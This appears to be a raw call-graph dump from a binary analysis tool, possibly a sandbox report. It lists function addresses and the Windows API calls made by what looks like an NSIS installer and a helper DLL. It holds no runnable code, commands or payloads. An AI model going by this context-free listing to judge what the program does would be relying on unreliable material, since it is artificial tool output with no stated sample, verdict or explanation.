3742 403fbc SetTextColor 3740->3742 3743 403fe4 3741->3743 3744 403fde GetSysColor 3741->3744 3742->3741 3745 403ff5 3743->3745 3746 403feb SetBkColor 3743->3746 3744->3743 3745->3747 3748 404008 DeleteObject 3745->3748 3749 40400f CreateBrushIndirect 3745->3749 3746->3745 3747->3643 3748->3749 3749->3747 3751 405c87 3750->3751 3752 405c49 RegQueryValueExA 3750->3752 3751->3715 3753 405c6a RegCloseKey 3752->3753 3753->3751 3762 405fa6 3755->3762 3756 406012 CharPrevA 3758 40600e 3756->3758 3757 406003 CharNextA 3757->3758 3757->3762 3758->3756 3759 40602d 3758->3759 3759->3715 3761 405ff1 CharNextA 3761->3762 3762->3757 3762->3758 3762->3761 3763 405ffe CharNextA 3762->3763 3767 4057cc 3762->3767 3763->3757 3764->3715 3765->3715 3766->3704 3768 4057d2 3767->3768 3769 4057e5 3768->3769 3770 4057d8 CharNextA 3768->3770 3769->3762 3770->3768 4642 401cc2 4643 402a1d 18 API calls 4642->4643 4644 401cd2 SetWindowLongA 4643->4644 4645 4028cf 4644->4645 4646 401a43 4647 402a1d 18 API calls 4646->4647 4648 401a49 4647->4648 4649 402a1d 18 API calls 4648->4649 4650 4019f3 4649->4650 4651 401e44 4652 402a3a 18 API calls 4651->4652 4653 401e4a 4652->4653 4654 404f48 25 API calls 4653->4654 4655 401e54 4654->4655 4656 4054c0 2 API calls 4655->4656 4658 401e5a 4656->4658 4657 401eb0 CloseHandle 4661 4026a6 4657->4661 4658->4657 4659 401e79 WaitForSingleObject 4658->4659 4658->4661 4662 406104 2 API calls 4658->4662 4659->4658 4660 401e87 GetExitCodeProcess 4659->4660 4663 401ea2 4660->4663 4664 401e99 4660->4664 4662->4659 4663->4657 4666 405c8d wsprintfA 4664->4666 4666->4663 4667 402644 4668 40264a 4667->4668 4669 402652 FindClose 4668->4669 4670 4028cf 4668->4670 4669->4670 4671 4048c5 GetDlgItem GetDlgItem 4672 404917 7 API calls 4671->4672 4679 404b2f 4671->4679 4673 4049ba DeleteObject 4672->4673 4674 4049ad SendMessageA 4672->4674 4675 4049c3 4673->4675 4674->4673 4676 4049fa 4675->4676 4678 405d51 18 API calls 4675->4678 4680 403f14 19 API calls 4676->4680 4677 404c13 4681 404cbf 4677->4681 4692 404c6c SendMessageA 4677->4692 4712 404b22 4677->4712 4683 4049dc SendMessageA SendMessageA 4678->4683 4679->4677 4682 404ba0 4679->4682 4724 404813 SendMessageA 4679->4724 4686 404a0e 4680->4686 4684 404cd1 4681->4684 4685 404cc9 SendMessageA 4681->4685 4682->4677 4688 404c05 SendMessageA 4682->4688 4683->4675 4689 404cfa 4684->4689 4694 404ce3 ImageList_Destroy 4684->4694 4695 404cea 4684->4695 4685->4684 4691 403f14 19 API calls 4686->4691 4687 403f7b 8 API calls 4693 404eb5 4687->4693 4688->4677 4697 404e69 4689->4697 4718 404d35 4689->4718 4729 404893 4689->4729 4696 404a1c 4691->4696 4698 404c81 SendMessageA 4692->4698 4692->4712 4694->4695 4695->4689 4699 404cf3 GlobalFree 4695->4699 4700 404af0 GetWindowLongA SetWindowLongA 4696->4700 4707 404aea 4696->4707 4710 404a6b SendMessageA 4696->4710 4713 404aa7 SendMessageA 4696->4713 4714 404ab8 SendMessageA 4696->4714 4702 404e7b ShowWindow GetDlgItem ShowWindow 4697->4702 4697->4712 4705 404c94 4698->4705 4699->4689 4701 404b09 4700->4701 4703 404b27 4701->4703 4704 404b0f ShowWindow 4701->4704 4702->4712 4723 403f49 SendMessageA 4703->4723 4722 403f49 SendMessageA 4704->4722 4706 404ca5 SendMessageA 4705->4706 4706->4681 4707->4700 4707->4701 4710->4696 4712->4687 4713->4696 4714->4696 4715 404e3f InvalidateRect 4715->4697 4716 404e55 4715->4716 4738 4047ce 4716->4738 4717 404d63 SendMessageA 4721 404d79 4717->4721 4718->4717 4718->4721 4720 404ded SendMessageA SendMessageA 4720->4721 4721->4715 4721->4720 4722->4712 4723->4679 4725 404872 SendMessageA 4724->4725 4726 404836 GetMessagePos ScreenToClient SendMessageA 4724->4726 4727 40486a 4725->4727 4726->4727 4728 40486f 4726->4728 4727->4682 4728->4725 4741 405d2f lstrcpynA 4729->4741 4731 4048a6 4742 405c8d wsprintfA 4731->4742 4733 4048b0 4734 40140b 2 API calls 4733->4734 4735 4048b9 4734->4735 4743 405d2f lstrcpynA 4735->4743 4737 4048c0 4737->4718 4744 404709 4738->4744 4740 4047e3 4740->4697 4741->4731 4742->4733 4743->4737 4745 40471f 4744->4745 4746 405d51 18 API calls 4745->4746 4747 404783 4746->4747 4748 405d51 18 API calls 4747->4748 4749 40478e 4748->4749 4750 405d51 18 API calls 4749->4750 4751 4047a4 lstrlenA wsprintfA SetDlgItemTextA 4750->4751 4751->4740 4752 4026c6 4753 402a3a 18 API calls 4752->4753 4754 4026d4 4753->4754 4755 4026ea 4754->4755 4756 402a3a 18 API calls 4754->4756 4757 40597d 2 API calls 4755->4757 4756->4755 4758 4026f0 4757->4758 4780 4059a2 GetFileAttributesA CreateFileA 4758->4780 4760 4026fd 4761 4027a0 4760->4761 4762 402709 GlobalAlloc 4760->4762 4765 4027a8 DeleteFileA 4761->4765 4766 4027bb 4761->4766 4763 402722 4762->4763 4764 402797 CloseHandle 4762->4764 4781 4030c7 SetFilePointer 4763->4781 4764->4761 4765->4766 4768 402728 4769 4030b1 ReadFile 4768->4769 4770 402731 GlobalAlloc 4769->4770 4771 402741 4770->4771 4772 402775 4770->4772 4773 402e9f 32 API calls 4771->4773 4774 405a49 WriteFile 4772->4774 4779 40274e 4773->4779 4775 402781 GlobalFree 4774->4775 4776 402e9f 32 API calls 4775->4776 4777 402794 4776->4777 4777->4764 4778 40276c GlobalFree 4778->4772 4779->4778 4780->4760 4781->4768 4782 402847 4783 402a1d 18 API calls 4782->4783 4784 40284d 4783->4784 4785 40287e 4784->4785 4786 40285b 4784->4786 4789 4026a6 4784->4789 4787 405d51 18 API calls 4785->4787 4785->4789 4786->4789 4790 405c8d wsprintfA 4786->4790 4787->4789 4790->4789 4791 4022c7 4792 402a3a 18 API calls 4791->4792 4793 4022d8 4792->4793 4794 402a3a 18 API calls 4793->4794 4795 4022e1 4794->4795 4796 402a3a 18 API calls 4795->4796 4797 4022eb GetPrivateProfileStringA 4796->4797 3928 401bca 3929 402a1d 18 API calls 3928->3929 3930 401bd1 3929->3930 3931 402a1d 18 API calls 3930->3931 3932 401bdb 3931->3932 3933 402a3a 18 API calls 3932->3933 3937 401beb 3932->3937 3933->3937 3934 402a3a 18 API calls 3938 401bfb 3934->3938 3935 401c06 3939 402a1d 18 API calls 3935->3939 3936 401c4a 3940 402a3a 18 API calls 3936->3940 3937->3934 3937->3938 3938->3935 3938->3936 3941 401c0b 3939->3941 3942 401c4f 3940->3942 3943 402a1d 18 API calls 3941->3943 3944 402a3a 18 API calls 3942->3944 3945 401c14 3943->3945 3946 401c58 FindWindowExA 3944->3946 3947 401c3a SendMessageA 3945->3947 3948 401c1c SendMessageTimeoutA 3945->3948 3949 401c76 3946->3949 3947->3949 3948->3949 4078 1000270b 4079 1000275b 4078->4079 4080 1000271b VirtualProtect 4078->4080 4080->4079 4801 1000180d 4802 10001830 4801->4802 4803 10001860 GlobalFree 4802->4803 4804 10001872 4802->4804 4803->4804 4805 10001266 2 API calls 4804->4805 4806 100019e3 GlobalFree GlobalFree 4805->4806 4528 401751 4529 402a3a 18 API calls 4528->4529 4530 401758 4529->4530 4531 401776 4530->4531 4532 40177e 4530->4532 4568 405d2f lstrcpynA 4531->4568 4569 405d2f lstrcpynA 4532->4569 4535 401789 4537 4057a1 3 API calls 4535->4537 4536 40177c 4539 405f9a 5 API calls 4536->4539 4538 40178f lstrcatA 4537->4538 4538->4536 4561 40179b 4539->4561 4540 406033 2 API calls 4540->4561 4541 4017dc 4543 40597d 2 API calls 4541->4543 4543->4561 4544 4017b2 CompareFileTime 4544->4561 4545 401876 4546 404f48 25 API calls 4545->4546 4549 401880 4546->4549 4547 404f48 25 API calls 4555 401862 4547->4555 4548 405d2f lstrcpynA 4548->4561 4550 402e9f 32 API calls 4549->4550 4551 401893 4550->4551 4552 4018a7 SetFileTime 4551->4552 4554 4018b9 CloseHandle 4551->4554 4552->4554 4553 405d51 18 API calls 4553->4561 4554->4555 4556 4018ca 4554->4556 4557 4018e2 4556->4557 4558 4018cf 4556->4558 4560 405d51 18 API calls 4557->4560 4559 405d51 18 API calls 4558->4559 4562 4018d7 lstrcatA 4559->4562 4563 4018ea 4560->4563 4561->4540 4561->4541 4561->4544 4561->4545 4561->4548 4561->4553 4564 405525 MessageBoxIndirectA 4561->4564 4566 40184d 4561->4566 4567 4059a2 GetFileAttributesA CreateFileA 4561->4567 4562->4563 4563->4555 4565 405525 MessageBoxIndirectA 4563->4565 4564->4561 4565->4555 4566->4547 4566->4555 4567->4561 4568->4536 4569->4535 4807 401651 4808 402a3a 18 API calls 4807->4808 4809 401657 4808->4809 4810 406033 2 API calls 4809->4810 4811 40165d 4810->4811 4812 401951 4813 402a1d 18 API calls 4812->4813 4814 401958 4813->4814 4815 402a1d 18 API calls 4814->4815 4816 401962 4815->4816 4817 402a3a 18 API calls 4816->4817 4818 40196b 4817->4818 4819 40197e lstrlenA 4818->4819 4820 4019b9 4818->4820 4821 401988 4819->4821 4821->4820 4825 405d2f lstrcpynA 4821->4825 4823 4019a2 4823->4820 4824 4019af lstrlenA 4823->4824 4824->4820 4825->4823 4826 404352 4827 40437e 4826->4827 4828 40438f 4826->4828 4887 405509 GetDlgItemTextA 4827->4887 4829 40439b GetDlgItem 4828->4829 4836 4043fa 4828->4836 4831 4043af 4829->4831 4835 4043c3 SetWindowTextA 4831->4835 4840 40583a 4 API calls 4831->4840 4832 4044de 4837 404688 4832->4837 4889 405509 GetDlgItemTextA 4832->4889 4833 404389 4834 405f9a 5 API calls 4833->4834 4834->4828 4841 403f14 19 API calls 4835->4841 4836->4832 4836->4837 4842 405d51 18 API calls 4836->4842 4839 403f7b 8 API calls 4837->4839 4844 40469c 4839->4844 4845 4043b9 4840->4845 4846 4043df 4841->4846 4847 40446e SHBrowseForFolderA 4842->4847 4843 40450e 4848 40588f 18 API calls 4843->4848 4845->4835 4852 4057a1 3 API calls 4845->4852 4849 403f14 19 API calls 4846->4849 4847->4832 4850 404486 CoTaskMemFree 4847->4850 4851 404514 4848->4851 4853 4043ed 4849->4853 4854 4057a1 3 API calls 4850->4854 4890 405d2f lstrcpynA 4851->4890 4852->4835 4888 403f49 SendMessageA 4853->4888 4856 404493 4854->4856 4859 4044ca SetDlgItemTextA 4856->4859 4863 405d51 18 API calls 4856->4863 4858 4043f3 4862 4060c8 5 API calls 4858->4862 4859->4832 4860 40452b 4861 4060c8 5 API calls 4860->4861 4869 404532 4861->4869 4862->4836 4864 4044b2 lstrcmpiA 4863->4864 4864->4859 4866 4044c3 lstrcatA 4864->4866 4865 40456e 4891 405d2f lstrcpynA 4865->4891 4866->4859 4868 404575 4870 40583a 4 API calls 4868->4870 4869->4865 4874 4057e8 2 API calls 4869->4874 4875 4045c6 4869->4875 4871 40457b GetDiskFreeSpaceA 4870->4871 4873 40459f MulDiv 4871->4873 4871->4875 4873->4875 4874->4869 4876 404637 4875->4876 4878 4047ce 21 API calls 4875->4878 4877 40465a 4876->4877 4879 40140b 2 API calls 4876->4879 4892 403f36 KiUserCallbackDispatcher 4877->4892 4880 404624 4878->4880 4879->4877 4881 404639 SetDlgItemTextA 4880->4881 4882 404629 4880->4882 4881->4876 4884 404709 21 API calls 4882->4884 4884->4876 4885 404676 4885->4837 4893 4042e7 4885->4893 4887->4833 4888->4858 4889->4843 4890->4860 4891->4868 4892->4885 4894 4042f5 4893->4894 4895 4042fa SendMessageA 4893->4895 4894->4895 4895->4837 4896 4019d2 4897 402a3a 18 API calls 4896->4897 4898 4019d9 4897->4898 4899 402a3a 18 API calls 4898->4899 4900 4019e2 4899->4900 4901 4019e9 lstrcmpiA 4900->4901 4902 4019fb lstrcmpA 4900->4902 4903 4019ef 4901->4903 4902->4903 4904 4021d2 4905 402a3a 18 API calls 4904->4905 4906 4021d8 4905->4906 4907 402a3a 18 API calls 4906->4907 4908 4021e1 4907->4908 4909 402a3a 18 API calls 4908->4909 4910 4021ea 4909->4910 4911 406033 2 API calls 4910->4911 4912 4021f3 4911->4912 4913 402204 lstrlenA lstrlenA 4912->4913 4917 4021f7 4912->4917 4915 404f48 25 API calls 4913->4915 4914 404f48 25 API calls 4918 4021ff 4914->4918 4916 402240 SHFileOperationA 4915->4916 4916->4917 4916->4918 4917->4914 4917->4918 4594 4014d6 4595 402a1d 18 API calls 4594->4595 4596 4014dc Sleep 4595->4596 4598 4028cf 4596->4598 4919 1000161a 4920 10001649 4919->4920 4921 10001a5d 18 API calls 4920->4921 4922 10001650 4921->4922 4923 10001663 4922->4923 4924 10001657 4922->4924 4925 1000168a 4923->4925 4926 1000166d 4923->4926 4927 10001266 2 API calls 4924->4927 4929 10001690 4925->4929 4930 100016b4 4925->4930 4928 100014e2 3 API calls 4926->4928 4934 10001661 4927->4934 4932 10001672 4928->4932 4933 10001559 3 API calls 4929->4933 4931 100014e2 3 API calls 4930->4931 4931->4934 4935 10001559 3 API calls 4932->4935 4936 10001695 4933->4936 4937 10001678 4935->4937 4938 10001266 2 API calls 4936->4938 4939 10001266 2 API calls 4937->4939 4940 1000169b GlobalFree 4938->4940 4941 1000167e GlobalFree 4939->4941 4940->4934 4942 100016af GlobalFree 4940->4942 4941->4934 4942->4934 4943 40155b 4944 401577 ShowWindow 4943->4944 4945 40157e 4943->4945 4944->4945 4946 40158c ShowWindow 4945->4946 4947 4028cf 4945->4947 4946->4947 4612 40255c 4613 402a1d 18 API calls 4612->4613 4618 402566 4613->4618 4614 4025d0 4615 405a1a ReadFile 4615->4618 4616 4025d2 4621 405c8d wsprintfA 4616->4621 4617 4025e2 4617->4614 4620 4025f8 SetFilePointer 4617->4620 4618->4614 4618->4615 4618->4616 4618->4617 4620->4614 4621->4614 4948 40405d 4949 404073 4948->4949 4950 40417f 4948->4950 4953 403f14 19 API calls 4949->4953 4951 4041ee 4950->4951 4956 4042c2 4950->4956 4960 4041c3 GetDlgItem SendMessageA 4950->4960 4952 4041f8 GetDlgItem 4951->4952 4951->4956 4955 40420e 4952->4955 4959 404280 4952->4959 4954 4040c9 4953->4954 4958 403f14 19 API calls 4954->4958 4955->4959 4963 404234 6 API calls 4955->4963 4957 403f7b 8 API calls 4956->4957 4961 4042bd 4957->4961 4962 4040d6 CheckDlgButton 4958->4962 4959->4956 4964 404292 4959->4964 4979 403f36 KiUserCallbackDispatcher 4960->4979 4977 403f36 KiUserCallbackDispatcher 4962->4977 4963->4959 4967 404298 SendMessageA 4964->4967 4968 4042a9 4964->4968 4967->4968 4968->4961 4972 4042af SendMessageA 4968->4972 4969 4041e9 4970 4042e7 SendMessageA 4969->4970 4970->4951 4971 4040f4 GetDlgItem 4978 403f49 SendMessageA 4971->4978 4972->4961 4974 40410a SendMessageA 4975 404131 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4974->4975 4976 404128 GetSysColor 4974->4976 4975->4961 4976->4975 4977->4971 4978->4974 4979->4969 4980 40205e 4981 402a3a 18 API calls 4980->4981 4982 402065 4981->4982 4983 402a3a 18 API calls 4982->4983 4984 40206f 4983->4984 4985 402a3a 18 API calls 4984->4985 4986 402079 4985->4986 4987 402a3a 18 API calls 4986->4987 4988 402083 4987->4988 4989 402a3a 18 API calls 4988->4989 4990 40208d 4989->4990 4991 4020cc CoCreateInstance 4990->4991 4992 402a3a 18 API calls 4990->4992 4995 4020eb 4991->4995 4997 402193 4991->4997 4992->4991 4993 401423 25 API calls 4994 4021c9 4993->4994 4996 402173 MultiByteToWideChar 4995->4996 4995->4997 4996->4997 4997->4993 4997->4994 4998 40265e 4999 402664 4998->4999 5000 402668 FindNextFileA 4999->5000 5003 40267a 4999->5003 5001 4026b9 5000->5001 5000->5003 5004 405d2f lstrcpynA 5001->5004 5004->5003 5005 401cde GetDlgItem GetClientRect 5006 402a3a 18 API calls 5005->5006 5007 401d0e LoadImageA SendMessageA 5006->5007 5008 401d2c DeleteObject 5007->5008 5009 4028cf 5007->5009 5008->5009 5010 401662 5011 402a3a 18 API calls 5010->5011 5012 401669 5011->5012 5013 402a3a 18 API calls 5012->5013 5014 401672 5013->5014 5015 402a3a 18 API calls 5014->5015 5016 40167b MoveFileA 5015->5016 5017 40168e 5016->5017 5023 401687 5016->5023 5019 406033 2 API calls 5017->5019 5021 4021c9 5017->5021 5018 401423 25 API calls 5018->5021 5020 40169d 5019->5020 5020->5021 5022 405bea 38 API calls 5020->5022 5022->5023 5023->5018 3771 402364 3772 40236a 3771->3772 3788 402a3a 3772->3788 3775 402a3a 18 API calls 3776 402386 RegCreateKeyExA 3775->3776 3777 4026a6 3776->3777 3779 4023b0 3776->3779 3778 4023c8 3781 4023d4 3778->3781 3794 402a1d 3778->3794 3779->3778 3780 402a3a 18 API calls 3779->3780 3782 4023c1 lstrlenA 3780->3782 3784 4023ef RegSetValueExA 3781->3784 3797 402e9f 3781->3797 3782->3778 3786 402405 RegCloseKey 3784->3786 3786->3777 3789 402a46 3788->3789 3790 405d51 18 API calls 3789->3790 3791 402a67 3790->3791 3792 40237c 3791->3792 3793 405f9a 5 API calls 3791->3793 3792->3775 3793->3792 3795 405d51 18 API calls 3794->3795 3796 402a31 3795->3796 3796->3781 3799 402eb5 3797->3799 3798 402ee3 3817 4030b1 3798->3817 3799->3798 3833 4030c7 SetFilePointer 3799->3833 3803 402f00 GetTickCount 3806 403034 3803->3806 3813 402f4f 3803->3813 3804 40304a 3805 40308c 3804->3805 3810 40304e 3804->3810 3807 4030b1 ReadFile 3805->3807 3806->3784 3807->3806 3808 4030b1 ReadFile 3808->3813 3809 4030b1 ReadFile 3809->3810 3810->3806 3810->3809 3811 405a49 WriteFile 3810->3811 3811->3810 3812 402fa5 GetTickCount 3812->3813 3813->3806 3813->3808 3813->3812 3814 402fca MulDiv wsprintfA 3813->3814 3831 405a49 WriteFile 3813->3831 3820 404f48 3814->3820 3834 405a1a ReadFile 3817->3834 3821 404f63 3820->3821 3830 405006 3820->3830 3822 404f80 lstrlenA 3821->3822 3823 405d51 18 API calls 3821->3823 3824 404fa9 3822->3824 3825 404f8e lstrlenA 3822->3825 3823->3822 3827 404fbc 3824->3827 3828 404faf SetWindowTextA 3824->3828 3826 404fa0 lstrcatA 3825->3826 3825->3830 3826->3824 3829 404fc2 SendMessageA SendMessageA SendMessageA 3827->3829 3827->3830 3828->3827 3829->3830 3830->3813 3832 405a67 3831->3832 3832->3813 3833->3798 3835 402eee 3834->3835 3835->3803 3835->3804 3835->3806 5024 401dea 5025 402a3a 18 API calls 5024->5025 5026 401df0 5025->5026 5027 402a3a 18 API calls 5026->5027 5028 401df9 5027->5028 5029 402a3a 18 API calls 5028->5029 5030 401e02 5029->5030 5031 402a3a 18 API calls 5030->5031 5032 401e0b 5031->5032 5033 401423 25 API calls 5032->5033 5034 401e12 ShellExecuteA 5033->5034 5035 401e3f 5034->5035 5036 40366d 5037 403678 5036->5037 5038 40367c 5037->5038 5039 40367f GlobalAlloc 5037->5039 5039->5038 5040 401eee 5041 402a3a 18 API calls 5040->5041 5042 401ef5 5041->5042 5043 4060c8 5 API calls 5042->5043 5044 401f04 5043->5044 5045 401f1c GlobalAlloc 5044->5045 5046 401f84 5044->5046 5045->5046 5047 401f30 5045->5047 5048 4060c8 5 API calls 5047->5048 5049 401f37 5048->5049 5050 4060c8 5 API calls 5049->5050 5051 401f41 5050->5051 5051->5046 5055 405c8d wsprintfA 5051->5055 5053 401f78 5056 405c8d wsprintfA 5053->5056 5055->5053 5056->5046 5057 4014f0 SetForegroundWindow 5058 4028cf 5057->5058 5059 100015b3 5060 100014bb GlobalFree 5059->5060 5061 100015cb 5060->5061 5062 10001611 GlobalFree 5061->5062 5063 100015e6 5061->5063 5064 100015fd VirtualFree 5061->5064 5063->5062 5064->5062 5070 4018f5 5071 40192c 5070->5071 5072 402a3a 18 API calls 5071->5072 5073 401931 5072->5073 5074 4055d1 69 API calls 5073->5074 5075 40193a 5074->5075 5076 4024f7 5077 402a3a 18 API calls 5076->5077 5078 4024fe 5077->5078 5081 4059a2 GetFileAttributesA CreateFileA 5078->5081 5080 40250a 5081->5080 5082 4018f8 5083 402a3a 18 API calls 5082->5083 5084 4018ff 5083->5084 5085 405525 MessageBoxIndirectA 5084->5085 5086 401908 5085->5086 5087 1000103d 5088 1000101b 5 API calls 5087->5088 5089 10001056 5088->5089 5090 4014fe 5091 401506 5090->5091 5093 401519 5090->5093 5092 402a1d 18 API calls 5091->5092 5092->5093 5094 402b7f 5095 402ba7 5094->5095 5096 402b8e SetTimer 5094->5096 5097 402bfc 5095->5097 5098 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5095->5098 5096->5095 5098->5097 5099 401000 5100 401037 BeginPaint GetClientRect 5099->5100 5101 40100c DefWindowProcA 5099->5101 5102 4010f3 5100->5102 5104 401179 5101->5104 5105 401073 CreateBrushIndirect FillRect DeleteObject 5102->5105 5106 4010fc 5102->5106 5105->5102 5107 401102 CreateFontIndirectA 5106->5107 5108 401167 EndPaint 5106->5108 5107->5108 5109 401112 6 API calls 5107->5109 5108->5104 5109->5108 5110 402482 5111 402b44 19 API calls 5110->5111 5112 40248c 5111->5112 5113 402a1d 18 API calls 5112->5113 5114 402495 5113->5114 5115 4024b8 RegEnumValueA 5114->5115 5116 4024ac RegEnumKeyA 5114->5116 5118 4026a6 5114->5118 5117 4024d1 RegCloseKey 5115->5117 5115->5118 5116->5117 5117->5118 5120 401b02 5121 402a3a 18 API calls 5120->5121 5122 401b09 5121->5122 5123 402a1d 18 API calls 5122->5123 5124 401b12 wsprintfA 5123->5124 5125 4028cf 5124->5125 5126 401a03 5127 402a3a 18 API calls 5126->5127 5128 401a0c ExpandEnvironmentStringsA 5127->5128 5129 401a20 5128->5129 5131 401a33 5128->5131 5130 401a25 lstrcmpA 5129->5130 5129->5131 5130->5131 5132 402283 5133 402291 5132->5133 5134 40228b 5132->5134 5136 4022a1 5133->5136 5137 402a3a 18 API calls 5133->5137 5135 402a3a 18 API calls 5134->5135 5135->5133 5138 4022af 5136->5138 5139 402a3a 18 API calls 5136->5139 5137->5136 5140 402a3a 18 API calls 5138->5140 5139->5138 5141 4022b8 WritePrivateProfileStringA 5140->5141 5142 100029c3 5143 100029db 5142->5143 5144 10001534 2 API calls 5143->5144 5145 100029f6 5144->5145 3836 405086 3837 405231 3836->3837 3838 4050a8 GetDlgItem GetDlgItem GetDlgItem 3836->3838 3840 405261 3837->3840 3841 405239 GetDlgItem CreateThread CloseHandle 3837->3841 3882 403f49 SendMessageA 3838->3882 3843 40528f 3840->3843 3844 4052b0 3840->3844 3845 405277 ShowWindow ShowWindow 3840->3845 3841->3840 3885 40501a OleInitialize 3841->3885 3842 405118 3848 40511f GetClientRect GetSystemMetrics SendMessageA SendMessageA 3842->3848 3846 405297 3843->3846 3847 4052ea 3843->3847 3852 403f7b 8 API calls 3844->3852 3884 403f49 SendMessageA 3845->3884 3850 4052c3 ShowWindow 3846->3850 3851 40529f 3846->3851 3847->3844 3857 4052f7 SendMessageA 3847->3857 3855 405171 SendMessageA SendMessageA 3848->3855 3856 40518d 3848->3856 3853 4052e3 3850->3853 3854 4052d5 3850->3854 3858 403eed SendMessageA 3851->3858 3859 4052bc 3852->3859 3861 403eed SendMessageA 3853->3861 3860 404f48 25 API calls 3854->3860 3855->3856 3862 4051a0 3856->3862 3863 405192 SendMessageA 3856->3863 3857->3859 3864 405310 CreatePopupMenu 3857->3864 3858->3844 3860->3853 3861->3847 3866 403f14 19 API calls 3862->3866 3863->3862 3865 405d51 18 API calls 3864->3865 3867 405320 AppendMenuA 3865->3867 3868 4051b0 3866->3868 3869 405351 TrackPopupMenu 3867->3869 3870 40533e GetWindowRect 3867->3870 3871 4051b9 ShowWindow 3868->3871 3872 4051ed GetDlgItem SendMessageA 3868->3872 3869->3859 3874 40536d 3869->3874 3870->3869 3875 4051dc 3871->3875 3876 4051cf ShowWindow 3871->3876 3872->3859 3873 405214 SendMessageA SendMessageA 3872->3873 3873->3859 3877 40538c SendMessageA 3874->3877 3883 403f49 SendMessageA 3875->3883 3876->3875 3877->3877 3879 4053a9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3877->3879 3880 4053cb SendMessageA 3879->3880 3880->3880 3881 4053ed GlobalUnlock SetClipboardData CloseClipboard 3880->3881 3881->3859 3882->3842 3883->3872 3884->3843 3886 403f60 SendMessageA 3885->3886 3887 40503d 3886->3887 3890 401389 2 API calls 3887->3890 3891 405064 3887->3891 3888 403f60 SendMessageA 3889 405076 OleUninitialize 3888->3889 3890->3887 3891->3888 3892 402308 3893 402338 3892->3893 3894 40230d 3892->3894 3895 402a3a 18 API calls 3893->3895 3904 402b44 3894->3904 3898 40233f 3895->3898 3897 402314 3899 40231e 3897->3899 3903 402355 3897->3903 3908 402a7a RegOpenKeyExA 3898->3908 3900 402a3a 18 API calls 3899->3900 3901 402325 RegDeleteValueA RegCloseKey 3900->3901 3901->3903 3905 402a3a 18 API calls 3904->3905 3906 402b5d 3905->3906 3907 402b6b RegOpenKeyExA 3906->3907 3907->3897 3909 402b0e 3908->3909 3917 402aa5 3908->3917 3909->3903 3910 402acb RegEnumKeyA 3911 402add RegCloseKey 3910->3911 3910->3917 3919 4060c8 GetModuleHandleA 3911->3919 3912 402b02 RegCloseKey 3916 402af1 3912->3916 3914 402a7a 5 API calls 3914->3917 3916->3909 3917->3910 3917->3911 3917->3912 3917->3914 3918 402b1d RegDeleteKeyA 3918->3916 3920 4060e4 3919->3920 3921 4060ee GetProcAddress 3919->3921 3925 40605a GetSystemDirectoryA 3920->3925 3923 402aed 3921->3923 3923->3916 3923->3918 3924 4060ea 3924->3921 3924->3923 3926 40607c wsprintfA LoadLibraryExA 3925->3926 3926->3924 5146 402688 5147 402a3a 18 API calls 5146->5147 5148 40268f FindFirstFileA 5147->5148 5149 4026b2 5148->5149 5152 4026a2 5148->5152 5150 4026b9 5149->5150 5154 405c8d wsprintfA 5149->5154 5155 405d2f lstrcpynA 5150->5155 5154->5150 5155->5152 5156 401c8a 5157 402a1d 18 API calls 5156->5157 5158 401c90 IsWindow 5157->5158 5159 4019f3 5158->5159 5160 40430b 5161 404341 5160->5161 5162 40431b 5160->5162 5164 403f7b 8 API calls 5161->5164 5163 403f14 19 API calls 5162->5163 5165 404328 SetDlgItemTextA 5163->5165 5166 40434d 5164->5166 5165->5161 4081 40310f SetErrorMode GetVersion 4082 403146 4081->4082 4083 40314c 4081->4083 4084 4060c8 5 API calls 4082->4084 4085 40605a 3 API calls 4083->4085 4084->4083 4086 403162 lstrlenA 4085->4086 4086->4083 4087 403171 4086->4087 4088 4060c8 5 API calls 4087->4088 4089 403179 4088->4089 4090 4060c8 5 API calls 4089->4090 4091 403180 #17 OleInitialize SHGetFileInfoA 4090->4091 4169 405d2f lstrcpynA 4091->4169 4093 4031bd GetCommandLineA 4170 405d2f lstrcpynA 4093->4170 4095 4031cf GetModuleHandleA 4096 4031e6 4095->4096 4097 4057cc CharNextA 4096->4097 4098 4031fa CharNextA 4097->4098 4106 40320a 4098->4106 4099 4032d4 4100 4032e7 GetTempPathA 4099->4100 4171 4030de 4100->4171 4102 4032ff 4103 403303 GetWindowsDirectoryA lstrcatA 4102->4103 4104 403359 DeleteFileA 4102->4104 4107 4030de 12 API calls 4103->4107 4181 402c66 GetTickCount GetModuleFileNameA 4104->4181 4105 4057cc CharNextA 4105->4106 4106->4099 4106->4105 4110 4032d6 4106->4110 4109 40331f 4107->4109 4109->4104 4113 403323 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4109->4113 4265 405d2f lstrcpynA 4110->4265 4111 40336d 4116 4033f3 4111->4116 4117 4057cc CharNextA 4111->4117 4165 403403 4111->4165 4115 4030de 12 API calls 4113->4115 4119 403351 4115->4119 4209 4036af 4116->4209 4121 403388 4117->4121 4119->4104 4119->4165 4128 403433 4121->4128 4129 4033ce 4121->4129 4122 40353b 4125 403543 GetCurrentProcess OpenProcessToken 4122->4125 4126 4035bd ExitProcess 4122->4126 4123 40341d 4275 405525 4123->4275 4131 40358e 4125->4131 4132 40355e LookupPrivilegeValueA AdjustTokenPrivileges 4125->4132 4279 4054a8 4128->4279 4133 40588f 18 API calls 4129->4133 4135 4060c8 5 API calls 4131->4135 4132->4131 4136 4033d9 4133->4136 4138 403595 4135->4138 4136->4165 4266 405d2f lstrcpynA 4136->4266 4141 4035aa ExitWindowsEx 4138->4141 4142 4035b6 4138->4142 4139 403454 lstrcatA lstrcmpiA 4144 403470 4139->4144 4139->4165 4140 403449 lstrcatA 4140->4139 4141->4126 4141->4142 4145 40140b 2 API calls 4142->4145 4147 403475 4144->4147 4148 40347c 4144->4148 4145->4126 4146 4033e8 4267 405d2f lstrcpynA 4146->4267 4282 40540e CreateDirectoryA 4147->4282 4287 40548b CreateDirectoryA 4148->4287 4152 403481 SetCurrentDirectoryA 4154 403490 4152->4154 4155 40349b 4152->4155 4290 405d2f lstrcpynA 4154->4290 4291 405d2f lstrcpynA 4155->4291 4158 4034a9 4159 405d51 18 API calls 4158->4159 4162 40352f 4158->4162 4164 405bea 38 API calls 4158->4164 4166 405d51 18 API calls 4158->4166 4168 40351b CloseHandle 4158->4168 4292 4054c0 CreateProcessA 4158->4292 4160 4034da DeleteFileA 4159->4160 4160->4158 4161 4034e7 CopyFileA 4160->4161 4161->4158 4163 405bea 38 API calls 4162->4163 4163->4165 4164->4158 4268 4035d5 4165->4268 4166->4158 4168->4158 4169->4093 